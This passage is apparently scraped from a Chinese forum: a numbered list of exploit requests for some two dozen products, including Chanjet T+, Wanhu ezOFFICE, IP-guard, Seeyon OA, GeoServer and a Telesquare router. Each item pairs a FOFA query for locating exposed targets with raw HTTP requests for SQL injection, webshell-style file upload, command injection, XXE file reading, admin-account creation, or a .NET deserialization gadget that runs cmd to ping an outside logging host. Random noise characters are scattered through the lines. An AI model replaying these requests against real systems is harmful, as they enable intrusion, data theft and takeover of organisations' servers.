User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.367 b9 J: z K9 s7 G4 _' Z
Content-Type: application/json
$ O7 i& I1 p) Q# \4 v8 `! t! S7 @% D! o3 s3 f3 }
{
5 |3 U" d* r( R1 P p "storeID":{3 Z" t5 O6 e# U/ G0 t0 `. T, v
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",7 S. O7 x8 X1 t. z; R
"MethodName":"Start",. \6 c0 C+ B9 i* Q
"ObjectInstance":{
9 [, ?: h, d! M1 p; `4 o: N4 t "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
3 j4 s7 a" y& N3 l- c1 C [ "StartInfo": {
7 n4 U1 ]+ q+ L7 a( A1 q- C1 Y" A+ Z "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",$ x6 O7 ~: a2 E. r- g2 q
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
4 N: p6 w' d# \$ s. Q7 @ }/ B$ v& ^8 H7 x9 o1 R
}' [" y. D* Z- Y! |6 e1 | E, E
}
( k# `- I5 [. n9 M}, ^- u( s; d4 j0 x; a1 y
5 ?% u l1 V# }! j* w; N' F
! O* e$ j H0 w2 _0 p. e* W, {
57. 畅捷通T+ keyEdit.aspx SQL注入- R- G" W, v. @1 N$ w9 Q
FOFA:app="畅捷通-TPlus"9 u# ~, E2 |, S7 Y. K% }
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1$ K- B; b2 c9 A `
Host: host3 X$ e. v, s5 y$ z2 `
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36/ N: g5 M0 D! W* _' j5 s
Accept-Charset: utf-8 r# \& }8 s0 V5 S5 K" H
Accept-Encoding: gzip, deflate
2 G: T v7 Y0 {' a6 iConnection: close4 \+ l O) e* `) E6 ~
/ F8 b- v7 ?6 N ?) N6 s/ K6 C( x: h2 v
58. 畅捷通T+ KeyInfoList.aspx sql注入 y% S! @* {& h/ s1 `, T. U
FOFA:app="畅捷通-TPlus"% ?4 d/ h+ w1 t
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1; I- Y/ C+ M: L
Host: your-ip
' D. e7 N' B; M9 RUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
! z* l* V( a* b; s( u6 U8 j' e' NAccept-Charset: utf-8
9 y" i- Z) l2 q0 {Accept-Encoding: gzip, deflate" U7 ~2 i5 l- m
Connection: close. t( _' f% M; i/ q7 \: A- ]
z! o# e; }/ z
/ p% ]3 o( J1 t- z59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行$ r9 E6 v9 g; g6 \( b& n
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"1 n t( [$ W N9 H! H; l
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.10 l) e0 b3 y3 H J) ^
Host: 192.168.86.128:9090
$ J: b1 M) r. q0 VUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
3 `) h. }- l% F' w) r0 DConnection: close
' k3 ]( m- X7 O& J! e( `' fContent-Length: 1669; U0 T) j6 g+ L; F" y- O% B
Accept: */*
* @# T0 A6 W6 w! P- WAccept-Language: en
& \' y" D7 R) qContent-Type: application/x-www-form-urlencoded# R8 Q0 p' Q* H- x/ T
Accept-Encoding: gzip
( `) @$ _" L/ E1 F2 c" E) E. [' P1 H6 S* o
PAYLOAD
3 A: M) U& c. @3 J! f2 }; `! P
# g) e# { b$ f/ [' m2 i8 j- y, M4 {4 g+ j _
60. 百卓Smart管理平台 importexport.php SQL注入5 {1 \ t* w1 W) B+ W
FOFA:title="Smart管理平台"
0 Y, x! N2 Y7 E2 l' xGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
. I& G1 z7 S3 r8 Q1 {8 GHost:
5 F& Z$ ~! X* g* F$ kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
; e e- n! x, C; ^. I7 {# H5 ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ U% I; o- ~* U# F7 }7 c* }0 [Accept-Encoding: gzip, deflate
! D* u6 p0 S0 |Accept-Language: zh-CN,zh;q=0.9
# G8 Z+ Z- z, D9 J s' S: hConnection: close
" L; i+ s d( c8 O, i
+ V! X- `+ T' b2 a6 X% x& V2 w% z k8 c, h! r2 H2 W+ N
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传+ v8 A# i4 }% c0 A4 N) @ ~3 k
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
* s- I, k& V( C3 ?+ {6 bPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
/ O$ R+ J$ K, }* i4 L- WHost: x.x.x.x1 n! m4 F% }: |4 Z* [6 d( R3 W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' ~3 u; {+ @1 c! U. V6 O7 j
Connection: close
. F1 H( b" U& r& D0 JContent-Length: 27/ Q! y" P# D- s
Accept: */*
$ E3 ]$ S' I' V4 U# e9 YAccept-Encoding: gzip, deflate
0 n" [7 D( \ c$ t% bAccept-Language: en+ n- {; N) l: N" {2 O
Content-Type: application/x-www-form-urlencoded
6 \7 \5 _! @; N: t* B
* x/ q A+ X+ n/ v) R# ^8uxssX66eqrqtKObcVa0kid98xa3 I; i9 b7 m$ ?' ` e$ ^
) k& @8 l7 I! p' B8 I4 \9 d$ M# ]; w
: L) r5 b9 D" ^1 I: _% X
62. IP-guard WebServer 远程命令执行
/ W8 Z& B1 a! _& r, |+ F( f, `; V' uFOFA:"IP-guard" && icon_hash="2030860561"- x X% b( X$ G( ], p P) D
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1( c( |3 c; B, { ~, |
Host: x.x.x.x" `, r5 w- Q* t* v* ?
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
; {) r( ^1 G5 Q: uConnection: close7 z% y2 Z) K6 U
Accept: */*
- O4 ~5 o5 E k$ X, [& F wAccept-Language: en) ^0 e4 ]: j' h; {7 ?' u) l
Accept-Encoding: gzip. O* F, R6 m' } X
; d: l+ Y+ t- E6 l' i, \/ a9 Y, c
, O3 h% b2 R4 D% P0 {
访问0 `7 P5 e% {8 |3 X& R) n" n/ |
; A' }8 p5 x2 f' N3 Z1 FGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.15 L2 D0 I) D/ w2 i
Host: x.x.x.x/ F1 o+ b; J4 ~) s
0 h0 n6 s+ c$ a+ b0 e/ X1 ?" U0 ?% u# Z# d3 b3 D+ q
63. IP-guard WebServer任意文件读取
/ h3 H3 G4 T) y0 Y. A' n% P7 N$ P5 cIP-guard < 4.82.0609.0! j; g' L- [1 C' s1 [
FOFA:icon_hash="2030860561"
$ |9 G3 `- k/ gPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
+ m6 Y# C+ G5 k/ D/ tHost: your-ip: M- V, N# h5 {! v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
' B' w7 `! a- y* J1 C* O) {! QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# m4 C' T4 `$ |4 e1 \; g) d3 CAccept-Encoding: gzip, deflate2 x# y# W4 Q* @: K
Accept-Language: zh-CN,zh;q=0.9, l' R' v1 v3 [
Connection: close
# d; x: e) E2 @ [5 mContent-Type: application/x-www-form-urlencoded
7 k7 a% H) W9 v( ~, U+ v
+ d7 s. ^6 ^4 j# G: v9 N0 _path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A/ F# n4 q8 b. x( f& a
$ o: w, ?# p) q/ e! h8 g64. 捷诚管理信息系统CWSFinanceCommon SQL注入3 s+ j9 n" P B( u6 b
FOFA:body="/Scripts/EnjoyMsg.js"( t `) \8 M; @! Y4 U
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.13 s: j* _( X& [2 G E t
Host: 192.168.86.128:9001
- N- K# o8 G& Q, X6 RUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
' l$ ]( c+ F5 p2 K! K/ B$ K, Z3 ~Connection: close& y9 L* m5 p6 Q! V( |+ R- ?; T
Content-Length: 3696 j, W: I7 j$ l- o
Accept: */*9 `. n* t: d5 l! b1 O3 ~% }* s
Accept-Language: en
6 B& P# N) r' y. Y& X# h/ i0 n; MContent-Type: text/xml; charset=utf-8* G7 E' r3 R' ]( e7 p8 A
Accept-Encoding: gzip# L/ X* {. A$ [" M' N- \1 R
. b7 ~& i# w) x# G4 y<?xml version="1.0" encoding="utf-8"?># `9 F0 H/ {; ]. |$ g% @2 l" a
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
* `9 ?- S9 X3 }0 r<soap:Body>: U! {5 D% X: V
<GetOSpById xmlns="http://tempuri.org/"> G! a3 T1 N& h# ^
<sId>1';waitfor delay '0:0:5'--+</sId>
" ~: b2 F1 ?; o0 i8 t$ } </GetOSpById>
0 {. f6 g7 Y! e8 r </soap:Body>
* l4 e0 u: e& n) a+ H/ j V</soap:Envelope>( `+ b w! T. g0 d `
! w' z g. J# w8 p% G- q$ b# @
5 e$ ?& w! o/ D, ^
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
3 d( v1 d" o( v% J/ pFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"3 L; C; {' t9 U, w' j; |0 B- A `
响应200即成功创建账号test123456/123456) W" \ {& s' A+ _) [8 X# V6 b
POST /SystemMng.ashx HTTP/1.1
0 k0 f6 {% r0 @! j7 q; rHost:
) G' b) w2 Y; |9 uUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
6 a6 w; F$ ` x5 n4 n6 yAccept-Encoding: gzip, deflate
5 _0 Z3 c; W8 v2 RAccept: */*# M/ _6 z% R" B) ]2 `: [! S
Connection: close! T/ i; p' d% |
Accept-Language: en
I4 L; n/ q3 N& I% kContent-Length: 174; G2 k& J; f" S6 g. Z0 ~3 j4 d
, U8 d* ?9 R2 g3 n
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
* f" i$ }: T7 ]2 e
& n% ?. \6 }7 v; S( x1 P+ d h) u7 v! x, l
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
; \: |1 x5 ?3 ^& A: p" I- p8 u0 w" NFOFA:app="万户ezOFFICE协同管理平台"& X% k5 v9 l$ g) U' A9 o0 Y) V1 @
! [3 u0 r' ?; ^# w* p
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
, I9 a5 A# O$ j# A* EHost: x.x.x.x
; _1 b+ s1 M1 |: a- TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
( M& c# E2 N% I2 W# p* AConnection: close
) f+ G( Y) {7 k/ FAccept: */*
# J1 k( c+ r& G- C9 x8 `; D# S1 uAccept-Language: en
& Y) n& h( p6 F9 C: C' ~Accept-Encoding: gzip) Y3 w, |9 ]! k
4 f/ k# B/ C i. b9 P: A( E
7 d/ a8 [! I' l% c5 Q6 X第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
% ~" `1 Y1 R8 Q) V& d0 u
+ X2 s, }: Z" B4 S67. 万户ezOFFICE wpsservlet任意文件上传: z* D9 y. I9 c( O# K4 w0 |% }
FOFA:app="万户网络-ezOFFICE"
5 _) C/ |6 U$ unewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型% L- Q# N( `/ i
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.12 R$ ]7 A/ b. G9 ^% J
Host: x.x.x.x
, L) `0 h: ~9 Z' b- N8 |User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
5 U2 D% X/ B- }) w! ?' NContent-Length: 173
; N8 u$ S$ B, D$ @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' c9 g* @. c6 M8 l) I# D% U
Accept-Encoding: gzip, deflate
+ n$ H7 ~" K! CAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3: z( f0 _' P' K9 p8 {
Connection: close
% ~8 B8 R/ G3 p* e1 `Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp2 N X6 X" [! D W3 E5 w- q X
DNT: 1' f+ b; ^1 x9 t2 m: |) |" Q5 e! i
Upgrade-Insecure-Requests: 18 l1 S3 K6 \7 D& F, X
' y/ ?8 @- t0 U: s8 X% W* n
--ufuadpxathqvxfqnuyuqaozvseiueerp
8 h( m9 {. e& ]Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"3 G3 V6 I8 z2 S
" C' _3 Y, u# \ W) [" v( d7 \3 q
<% out.print("sasdfghjkj");%>" Q9 p9 c H2 A9 B' [! l
--ufuadpxathqvxfqnuyuqaozvseiueerp--# ] H/ @/ M" v# Z( Z
0 q8 x8 P# u# w/ e& z/ U5 R( ^. D# M4 r* `' v; j8 G, [8 [! `
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
) m: e, n, W5 L1 n7 l8 r9 J+ V/ N
5 l3 E8 V2 U4 J$ Q" t$ Q! d- l68. 万户ezOFFICE wf_printnum.jsp SQL注入) ^) h+ C8 q* A% b2 ?3 n
FOFA:app="万户ezOFFICE协同管理平台"1 l. ^; T& b2 L- H% C% e5 B# k6 n
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
" n2 |0 W1 W y% t% |% B, Y# mHost: {{host}}
s# d3 H& W) [' Y: C! zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
# }, o/ y% N, [! K/ T! lAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.81 {4 N! U% ^0 U1 q; ]
Accept-Encoding: gzip, deflate; d4 l" h* t% \1 n% B
Accept-Language: zh-CN,zh;q=0.9
; A5 h& x, e' h: q8 _9 q b5 A7 v* aConnection: close$ O6 J( q9 [- M
$ P2 v" d7 [& U4 m
+ ]& ?/ f2 q: m* f( G69. 万户 ezOFFICE contract_gd.jsp SQL注入% {1 H1 o q3 b& ?8 L: l
FOFA:app="万户ezOFFICE协同管理平台"! p, }' L# D# z# f3 G$ S
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
- e6 E1 B: ? E) v. ]# ]Host: your-ip
' K' B: c5 Z1 X' [- _6 H' { wUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36. W" T; o% D5 N8 J, X( ~+ [
Accept-Encoding: gzip, deflate
7 w) `/ ~1 j) a$ l$ o& eAccept: */*
: ?+ L) g( M/ c6 N4 W1 AConnection: keep-alive
" E0 o( C2 V4 m; _) I0 R
7 Z2 `2 i: x I2 p% r, i' k0 m W
' s3 \* t$ x2 e+ {70. 万户ezEIP success 命令执行
0 F/ Y9 w S C, \FOFA:app="万户网络-ezEIP"
; Z2 ~0 E3 t* d- w! PPOST /member/success.aspx HTTP/1.1
' s, Q: }& @. \, h7 uHost: {{Hostname}}
, ^) @% s9 ~6 d9 U3 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
4 n% J; D- h; b& ]SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
7 z3 T0 f1 L9 O! |# ^, s+ k* pContent-Type: application/x-www-form-urlencoded
3 r) E6 ~% u0 \TYPE: C' |0 ^/ i0 ]$ {( ?
Content-Length: 167021 l( d/ v2 c# N1 @, Z0 i/ [
/ B/ a$ d m) s, x9 L5 Y& K
__VIEWSTATE=PAYLOAD
M7 h4 B. Z* k7 e Q1 _0 D% S
$ J7 A* F, z; m
7 w7 U& R* n$ `0 `0 N6 A* E71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
4 \2 Y# @3 `! g# r+ F" r tFOFA:body="PM2项目管理系统BS版增强工具.zip"
5 Z+ g. ?+ a& V% u$ C6 zGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
: G# S- u+ h6 @" l3 pHost: x.x.x.xx.x.x.x
" K0 N( r( ~$ a. |# X N8 e: cUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
, P1 ?0 x- w0 h* D' _Connection: close9 y* T" e" p3 S- x7 Y/ k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, k! v1 n9 P" ^
Accept-Encoding: gzip, deflate6 r. v/ S% O, x8 b' R2 T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 a, B V) j2 S( Q, IUpgrade-Insecure-Requests: 1 v: `# K: C9 C$ F( J
$ _6 m. ^, |& X" i3 g
7 M* x, H" f+ p G# y2 M! g72. 致远OA getAjaxDataServlet XXE0 T( S' s# }8 r+ M! P. R
FOFA:app="致远互联-OA"7 j0 T! R1 J! x3 T
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.19 e6 b+ R: r; t. v8 b% ]% i
Host: 192.168.40.131:8099" U. l9 K* a4 w* n; N# l: f* i
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.366 N8 h/ z% G7 Q" E# J6 B2 I8 ~4 |) Z
Connection: close
' L/ w4 A( v% lContent-Length: 5839 X. u2 c4 N, f4 B$ J/ O3 Y6 D
Content-Type: application/x-www-form-urlencoded7 h9 T' E; `* y1 B! d {
Accept-Encoding: gzip6 E7 g/ d& z! c1 |3 L$ }
+ \3 L7 ]/ v* dS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
/ }9 @2 x) Y* O L# |. g4 L' r# {
) _2 G$ G) _& ~$ k. h. i" x c: x1 r
( `: j$ x$ W/ h- h) J& v. _5 ?73. GeoServer wms远程代码执行/ e4 z" j- q8 W' w/ X& Y; u
FOFA:icon_hash=”97540678”
6 F h& y3 h0 ^POST /geoserver/wms HTTP/1.1. q/ O# ]6 P' J8 h7 T
Host:: B/ i; s: C0 c; t. i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
7 q) I% J: [0 x! h" i( i' ~Content-Length: 1981
2 i; n8 Q7 W1 H& r: T# ^% M4 D' o/ GAccept-Encoding: gzip, deflate8 |6 ^" l8 d7 O$ T; @; H
Connection: close' S9 K( U1 o. T6 J
Content-Type: application/xml
; Y9 t& [% H, j! tSL-CE-SUID: 3
4 k4 y/ q; m/ l& A0 ^9 g+ Q/ J# ^. f, z
PAYLOAD
7 L4 u U# s8 H. a8 Z# }' w6 Z% }% R( L8 @1 K2 O
8 `! |' Y7 r, g; `* C5 X Q% y
74. 致远M3-server 6_1sp1 反序列化RCE- y0 K5 D( [- p
FOFA:title="M3-Server"
( K' e, b3 b# G7 W) DPAYLOAD7 Q/ D; z: w" A; _- X
U4 ?1 r P# f" f& `8 e75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE) c: L, y9 Q3 o* {
FOFA:app="TELESQUARE-TLR-2005KSH"
2 {+ B- P9 T, g( E6 D b0 L1 E, DGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.15 c- l+ a6 b% H& @& b2 ^
Host: x.x.x.x
- W" }. o# C4 N' a- n* {6 iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 }# r) k0 Z! k x4 e
Connection: close6 E# ]- c6 u/ `0 Y* D% ~ E, r& o, X
Accept: */*
: d& L% V8 r$ G! z K- P2 n# `5 q& tAccept-Language: en; m' t5 _ k) w) v+ c
Accept-Encoding: gzip0 c* U+ k6 g; V- Z' @
$ Z7 D9 f& i$ L( o# ~" B8 e
! x! T: V' q. ^. C3 h7 p' v/ sGET /cgi-bin/test28256.txt HTTP/1.1
" B0 A& s3 t5 U: l T+ vHost: x.x.x.x
: x, y0 B/ } Z# x6 G% q/ l: H$ k, ]& D) @$ W5 j
. E, _ O/ r% i* K4 i76. 新开普掌上校园服务管理平台service.action远程命令执行2 j" V1 x! S2 r4 F( l( R: [6 K8 t
FOFA:title="掌上校园服务管理平台"% N! i5 w- \' W0 z
POST /service_transport/service.action HTTP/1.1
1 p( H; L7 k, U3 A) I1 V' FHost: x.x.x.x2 X" z; m1 T; p6 O8 M7 X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
# H4 n- `7 Q, u# ~Connection: close
& v2 ?' g$ _, k6 {& F7 bContent-Length: 211
) T; Y! n, l5 M @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. H5 u1 \3 C6 b% O0 B6 \) N8 }* P
Accept-Encoding: gzip, deflate
8 x* M- n5 d2 A$ BAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; ~* c2 B. }7 UCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
. n( ^0 ^. e' m6 l. {3 QUpgrade-Insecure-Requests: 1* i& p- L( p* e1 m1 }8 B7 C3 y
0 p/ h! Q. N8 u{
; X( d# T" U* A"command": "GetFZinfo",
$ W6 |' G+ }" v7 D "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
& [7 H7 {- W: ]" X+ r ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"' G x5 t" J& i% q
}
- _+ I1 d* H' G& [. n: K' N! _" [+ E% `
" D% r1 p6 S3 M
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.10 n1 d( R. j H" L$ [1 j# \: t9 Z/ F
Host: x.x.x.x1 s8 U! Z. _; x8 ^7 b8 m
2 n8 |4 z) k! t6 v9 o
) t0 f0 z2 o+ C, I4 ^* g4 R8 R, u4 `
* I( L) ]' ~# P8 T% d- S77. F22服装管理软件系统UploadHandler.ashx任意文件上传8 E5 {, A, {' l9 z% y5 z
FOFA:body="F22WEB登陆") n, ]0 L, I; r* N) T& f% f
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.10 Q( z+ U. D9 c
Host: x.x.x.x9 ^( k$ g) z0 ]; P" P% \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36( l0 e: w4 M$ ~+ [1 l! e
Connection: close
. d, n5 p+ W& T2 T+ f% sContent-Length: 433
4 ?) V% \ e1 }! ^5 \" l# _/ y' iAccept: */*4 H) q) P! B. F$ w1 [/ T r$ R6 c
Accept-Encoding: gzip, deflate
0 L2 h9 E; Q5 [& l6 d) K0 Y. Q3 U! OAccept-Language: zh-CN,zh;q=0.9
; A. |' B- M! j1 \. z0 c9 ]Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
# i9 n, ~* |5 t1 s6 w8 S: \
+ T& g0 u1 K6 E+ V- P) q% `. S------------398jnjVTTlDVXHlE7yYnfwBoix+ q: X: `& i% q
Content-Disposition: form-data; name="folder"
8 k* k( t' M0 B, i
L: K. {$ N+ k0 |/upload/udplog* r, o+ j; D; e5 q- r
------------398jnjVTTlDVXHlE7yYnfwBoix
6 e! n/ S% G* w4 I2 X9 fContent-Disposition: form-data; name="Filedata"; filename="1.aspx"
* |* L, T) A% I) @Content-Type: application/octet-stream2 ?, ] D; K& k* l
7 T" I9 b0 Y7 B6 J+ Z. J1 X
hello1234567
5 s& i/ E8 X: n4 u; R% L% |7 K------------398jnjVTTlDVXHlE7yYnfwBoix
3 C' X* S8 {- } iContent-Disposition: form-data; name="Upload"- I3 z! {4 F' e9 z# C/ Q( J
1 G0 t1 k& O. V% C7 d: l* `% U) U! r6 zSubmit Query- x# R; [$ T6 H+ ` n
------------398jnjVTTlDVXHlE7yYnfwBoix--+ U! w) u7 T! `
6 t. q8 P( [2 I
* ?# e' t6 ], O- `' `) @
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
* T: S) x9 C/ v5 a- [FOFA:icon_hash="2001627082"
3 G j7 D1 G; }- u: F& u% W: tPOST /Platform/System/FileUpload.ashx HTTP/1.1
9 u) S% ^" x' x; u* s% ~Host: x.x.x.x
, q1 r2 S5 [/ l1 l9 d& RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 K# Q* u1 W' h# b% K; a/ TConnection: close
, [# b1 A R) R W4 n; NContent-Length: 336
4 e( b# \& N! i0 w& U% W* yAccept-Encoding: gzip
0 |% o% m+ @: k% uContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
5 }% @; B+ r" s8 L# P( m/ a/ C9 t* ]6 y) J9 Z0 J9 y
------YsOxWxSvj1KyZow1PTsh98fdu6l1 ~/ Y5 c3 z$ }7 x
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
7 l i5 Q! ~" k- p% W& `Content-Type: image/png
7 J, I) t% R" m1 i1 V$ g# ^* @: } Y8 z0 d% {5 N2 S% ? n- l
YsOxWxSvj1KyZow1PTsh98fdu6l
8 h# j; V. k1 ]3 A: g: Q------YsOxWxSvj1KyZow1PTsh98fdu6l! A, J( k, _/ @+ [
Content-Disposition: form-data; name="target"* k% Z+ w/ H6 p! a; E
: T& L( A; W) ?" E+ s$ w0 L8 [
/Applications/SkillDevelopAndEHS/
